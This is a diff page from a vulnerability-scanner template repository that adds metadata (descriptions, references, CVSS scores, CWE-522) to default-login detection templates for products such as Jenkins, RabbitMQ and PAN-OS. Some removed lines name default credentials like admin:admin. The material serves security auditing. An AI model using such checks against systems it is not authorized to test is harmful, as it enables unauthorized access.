reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22.
description: Guacamole default admin login credentials were detected.
reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -42,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/hongdian/hongdian-default-login.yaml
View File

@ -4,7 +4,15 @@ info:
name: Hongdian Default Login
author: gy741
severity: high
description: Hongdian default login information was detected.
tags: hongdian,default-login
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -46,3 +54,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

9
default-logins/hortonworks/smartsense-default-login.yaml
View File

@ -4,9 +4,14 @@ info:
name: HortonWorks SmartSense Default Login
author: Techryptic (@Tech)
severity: high
description: Default Login of admin:admin on HortonWorks SmartSense application.
description: HortonWorks SmartSense default admin login information was detected.
reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
tags: hortonworks,smartsense,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -36,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/hp/hp-switch-default-login.yaml
View File

@ -1,12 +1,18 @@
id: hp-switch-default-login
info:
name: HP 1820-8G Switch J9979A Default Credential
name: HP 1820-8G Switch J9979A Default Login
author: pussycat0x
severity: high
description: HP 1820-8G Switch J9979A default admin login credentials were discovered.
reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
metadata:
fofa-query: 'HP 1820-8G Switch J9979A'
tags: default-login,hp
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -31,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

9
default-logins/huawei/huawei-HG532e-default-router-login.yaml
View File

@ -1,11 +1,18 @@
id: huawei-HG532e-default-login
info:
name: Huawei HG532e Default Credential
description: Huawei HG532e default admin credentials were discovered.
author: pussycat0x
severity: high
metadata:
shodan-query: http.html:"HG532e"
tags: default-login,huawei
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -32,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

11
default-logins/ibm/ibm-mqseries-default-login.yaml
View File

@ -1,14 +1,19 @@
id: ibm-mqseries-default-login
info:
name: IBM MQSeries web console default login
name: IBM MQSeries Web Console Default Login
author: righettod
severity: high
description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
tags: ibm,default-login
reference:
- https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd
- https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -42,3 +47,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/03/10

12
default-logins/ibm/ibm-storage-default-credential.yaml
View File

@ -3,8 +3,16 @@ id: ibm-storage-default-login
info:
name: IBM Storage Management Default Login
author: madrobot
severity: medium
severity: high
tags: default-login,ibm,storage
description: IBM Storage Management default admin login credentials were discovered.
reference:
- https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -40,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

11
default-logins/idemia/idemia-biometrics-default-login.yaml
View File

@ -3,10 +3,15 @@ id: idemia-biometrics-default-login
info:
name: IDEMIA BIOMetrics Default Login
author: Techryptic (@Tech)
severity: high
description: Default Login of password=12345 on IDEMIA BIOMetrics application.
severity: medium
description: IDEMIA BIOMetrics application default login credentials were discovered.
reference: https://www.google.com/search?q=idemia+password%3D+"12345"
tags: idemia,biometrics,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -37,3 +42,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/iptime/iptime-default-login.yaml
View File

@ -4,7 +4,15 @@ info:
name: ipTIME Default Login
author: gy741
severity: high
description: ipTIME default admin credentials were discovered.
tags: iptime,default-login
reference:
- https://www.freewebtools.com/IPTIME/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -35,3 +43,5 @@ requests:
- "login.cgi"
part: body
condition: and
# Enhanced by mp on 2022/03/10

12
default-logins/jboss/jmx-default-login.yaml
View File

@ -1,10 +1,18 @@
id: jmx-default-login
info:
name: JBoss JMX Console Weak Credential
name: JBoss JMX Console Weak Credential Discovery
description: JBoss JMX Console default login information was discovered.
author: paradessia
severity: high
tags: jboss,jmx,default-login
reference:
- https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -36,3 +44,5 @@ requests:
- type: word
words:
- 'JMImplementation'
# Enhanced by mp on 2022/03/10

10
default-logins/jenkins/jenkins-default.yaml
View File

@ -1,10 +1,16 @@
id: jenkins-weak-password
info:
name: Jenkins Weak Password
name: Jenkins Default Login
author: Zandros0
severity: high
tags: jenkins,default-login
description: Jenkins default admin login information was discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -49,3 +55,5 @@ requests:
dsl:
- 'contains(body_3, "/logout")'
- 'contains(body_3, "Dashboard [Jenkins]")'
# Enhanced by mp on 2022/03/10

12
default-logins/kafka-center-default-login.yaml
View File

@ -1,12 +1,20 @@
id: kafka-center-default-login
info:
name: Kafka Center Default Login
name: Apache Kafka Center Default Login
author: dhiyaneshDK
severity: high
tags: kafka,default-login
description: Apache Kafka Center default admin credentials were discovered.
reference:
- https://developer.ibm.com/tutorials/kafka-authn-authz/
metadata:
shodan-query: http.title:"Kafka Center"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -36,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/minio/minio-default-login.yaml
View File

@ -5,6 +5,14 @@ info:
author: pikpikcu
severity: medium
tags: default-login,minio
description: Minio default admin credentials were discovered.
reference:
- https://docs.min.io/docs/minio-quickstart-guide.html#
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -40,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

12
default-logins/mofi/mofi4500-default-login.yaml
View File

@ -3,8 +3,16 @@ id: mofi4500-default-login
info:
name: MOFI4500-4GXeLTE-V2 Default Login
author: pikpikcu
severity: critical
severity: high
tags: mofi,default-login
description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered.
reference:
- https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -31,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/nagios/nagios-default-login.yaml
View File

@ -1,10 +1,18 @@
id: nagios-default-login
info:
name: Nagios Default Login
author: iamthefrogy
description: Nagios default admin credentials were discovered.
severity: high
tags: nagios,default-login
reference: https://www.nagios.org
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
- |
@ -32,3 +40,5 @@ requests:
- 'Current Status'
- 'Reports'
condition: and
# Enhanced by mp on 2022/03/10

8
default-logins/netsus/netsus-default-login.yaml
View File

@ -4,9 +4,15 @@ info:
name: NetSUS Server Default Login
author: princechaddha
severity: high
description: NetSUS Server default admin credentials were discovered.
metadata:
shodan-query: 'http.title:"NetSUS Server Login"'
tags: netsus,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -35,3 +41,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/03/10

8
default-logins/nexus/nexus-default-login.yaml
View File

@ -3,8 +3,14 @@ id: nexus-default-login
info:
name: Nexus Default Login
author: pikpikcu
description: Nexus default admin credentials were discovered.
severity: high
tags: nexus,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -34,3 +40,5 @@ requests:
- "NXSESSIONID"
part: header
condition: and
# Enhanced by mp on 2022/03/10

10
default-logins/nps/nps-default-login.yaml
View File

@ -4,7 +4,15 @@ info:
name: NPS Default Login
author: pikpikcu
severity: high
description: NPS default admin credentials were discovered.
tags: nps,default-login
reference:
- https://docs.microfocus.com/NNMi/10.30/Content/Administer/Hardening/confCC2b_pwd.htm
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -39,3 +47,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/ofbiz/ofbiz-default-login.yaml
View File

@ -3,8 +3,16 @@ id: ofbiz-default-login
info:
name: Apache OfBiz Default Login
author: pdteam
description: Apache OfBiz default admin credentials were discovered.
severity: medium
tags: ofbiz,default-login,apache
reference:
- https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -28,3 +36,5 @@ requests:
- "ofbiz-pagination-template"
- "<span>Powered by OFBiz</span>"
condition: and
# Enhanced by mp on 2022/03/10

10
default-logins/oracle/businessintelligence-default-login.yaml
View File

@ -3,8 +3,16 @@ id: oracle-business-intelligence-login
info:
name: Oracle Business Intelligence Default Login
author: milo2012
description: Oracle Business Intelligence default admin credentials were discovered.
severity: high
tags: oracle,default-login
reference:
- https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -43,3 +51,5 @@ requests:
words:
- 'createSessionReturn'
part: body
# Enhanced by mp on 2022/03/10

12
default-logins/paloalto/panos-default-login.yaml
View File

@ -4,9 +4,15 @@ info:
name: Palo Alto Networks PAN-OS Default Login
author: Techryptic (@Tech)
severity: high
description: Default Login of admin:admin on Palo Alto Networks PAN-OS application.
reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
description: Palo Alto Networks PAN-OS application default admin credentials were discovered.
reference:
- https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
tags: panos,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -38,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

12
default-logins/panabit/panabit-default-login.yaml
View File

@ -4,8 +4,16 @@ info:
name: Panabit Gateway Default Login
author: pikpikcu
severity: high
reference: https://max.book118.com/html/2017/0623/117514590.shtm
description: Panabit Gateway default credentials were discovered.
tags: panabit,default-login
reference:
- https://max.book118.com/html/2017/0623/117514590.shtm
- https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -47,3 +55,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/pentaho/pentaho-default-login.yaml
View File

@ -3,10 +3,18 @@ id: pentaho-default-login
info:
name: Pentaho Default Login
author: pussycat0x
description: Pentaho default admin credentials were discovered.
severity: high
metadata:
shodan-query: pentaho
tags: pentaho,default-login
reference:
- https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -36,3 +44,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/03/10

12
default-logins/rabbitmq/rabbitmq-default-login.yaml
View File

@ -1,10 +1,18 @@
id: rabbitmq-default-login
info:
name: RabbitMQ admin Default Login
name: RabbitMQ Default Login
author: fyoorer,dwisiswant0
severity: high
description: RabbitMQ default admin credentials were discovered.
tags: rabbitmq,default-login
reference:
- https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -34,3 +42,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

13
default-logins/rancher/rancher-default-login.yaml
View File

@ -4,9 +4,16 @@ info:
name: Rancher Default Login
author: princechaddha
severity: high
description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
reference: https://github.com/rancher/rancher
description: Rancher default admin credentials were discovered. Rancher is an open-source multi-cluster orchestration platform that lets operations teams deploy, manage and secure enterprise Kubernetes.
reference:
- https://github.com/rancher/rancher
- https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/
tags: default-login,rancher,kubernetes,devops,cloud
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -50,3 +57,5 @@ requests:
part: header
regex:
- 'Set-Cookie: CSRF=([a-z0-9]+)'
# Enhanced by mp on 2022/03/11

15
default-logins/ricoh/ricoh-weak-password.yaml
View File

@ -1,11 +1,18 @@
id: ricoh-weak-password
id: ricoh-default-login
info:
name: Ricoh Weak Password
name: Ricoh Default Login
author: gy741
severity: high
tags: ricoh,default-login
reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
description: Ricoh default admin credentials were discovered.
reference:
- https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -31,3 +38,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/03/11

10
default-logins/rockmongo/rockmongo-default-login.yaml
View File

@ -4,7 +4,15 @@ info:
name: Rockmongo Default Login
author: pikpikcu
severity: high
description: Rockmongo default admin credentials were discovered.
tags: rockmongo,default-login
reference:
- https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -35,3 +43,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/03/11

Some files were not shown because too many files have changed in this diff Show More